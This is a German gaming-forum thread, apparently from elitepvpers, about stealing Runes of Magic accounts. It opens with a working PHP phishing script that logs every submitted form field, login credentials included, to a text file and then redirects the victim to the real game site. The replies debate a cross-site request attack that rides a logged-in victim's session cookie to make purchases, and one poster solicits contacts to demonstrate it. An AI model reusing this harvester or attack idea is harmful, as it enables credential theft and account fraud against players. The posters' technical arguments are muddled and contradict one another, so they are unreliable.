<?php
header ('Location: http://www.runesofmagic.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Erm ja, deswegen hab ich ja gesagt, dass das Opfer im Accountsystem von Yusho eingeloggt sein muss, bzw hat sich morgens kurz eingeloggt um Dias zu kaufen. Das Fenster muss auch nicht offen sein, solange er den Browser in dieser Zeit nicht neustartet, dann wäre er anfällig für sowas da der Frogster Server keinen Unterschied macht ob ein Request von runesofmagic.com kommt oder von elitepvpers.com oder sonst wo.Quote:
aber die cookies werden doch auf dem rechner , des jeweiligen gespeichert und nicht auf dem browser , oder nicht?
Quote:
Nein, Ich gebe alle Informationen an, so wie ich sie haben möchte.
Es wird ledeglich das Cookie von jemand gebraucht was bei Browsern automatisch zugeordnet wird bei einem Request.
LOl? Ich denke schon das die IP des Servers Richtig eingetragen ist :D Der Server muß doch irgenwei wissen welcher account dias bestellt hat und diesem dann Dias zuordnen! Das geht wohl schlecht mit einem Fake Server.Quote:
Erm ja, deswegen hab ich ja gesagt, dass das Opfer im Accountsystem von Yusho eingeloggt sein muss, bzw hat sich morgens kurz eingeloggt um Dias zu kaufen. Das Fenster muss auch nicht offen sein, solange er den Browser in dieser Zeit nicht neustartet, dann wäre er anfällig für sowas da der Frogster Server keinen Unterschied macht ob ein Request von runesofmagic.com kommt oder von elitepvpers.com oder sonst wo.
Brauche ich nicht da ich mir zu 1000% sicher bin, dass es nichts anderes als PHISHING ist :) Wie Shadow schon sagte. Das geht aber nur wenn der Server von Yasho Daten an einen Anderen Server sendet. Un das geht nur in der Server/Domain einstellung selbst und nicht über Cookies....Quote:
Gib mir einfach deine MSN damit wir den Spuk von Unwissenheit hier mal endlich lüften können.
Wie oft noch, -das ist kein fakeserver- oder sonst was. Es wird ledeglich ein Request verschickt, der Browser ordnet das selber zu. Ich biete hier dir ein Beweis an und du trollst einfach weiter :rolleyes:Quote:
LOl? Ich denke schon das die IP des Servers Richtig eingetragen ist :D Der Server muß doch irgenwei wissen welcher account dias bestellt hat und diesem dann Dias zuordnen! Das geht wohl schlecht mit einem Fake Server.
Gibt mir einfach von irgendjemand eine MSN, damit ichs beweisen kann -.-Quote:
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
Sobald du versuchst dich irgenwo einzuloggen erstellst du automatisch einen cookie. Da kannst du genau so gut ne bruteforce starten und warten.Quote:
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
Kewl trolls, ich brauch schon eine von euch damit man auch sich mit euch unterhalten kann. Das ist ja auch der Sinn dabei und nicht das ich euch jetzt Accounts hacke, ihr versteht das nichtmal. :facepalm:Quote:
[Only registered and activated users can see links. Click Here To Register...]
ist aber nicht meine... oder brauchst du eine von uns?
Leider warst du dir nicht zu 1001% sicher, hatte es wolleboii auch nun genauer erklärt wieso das überhaupt geht.Quote:
Brauche ich nicht da ich mir zu 1000% sicher bin, dass es nichts anderes als PHISHING ist :) Wie Shadow schon sagte. Das geht aber nur wenn der Server von Yasho Daten an einen Anderen Server sendet. Un das geht nur in der Server/Domain einstellung selbst und nicht über Cookies....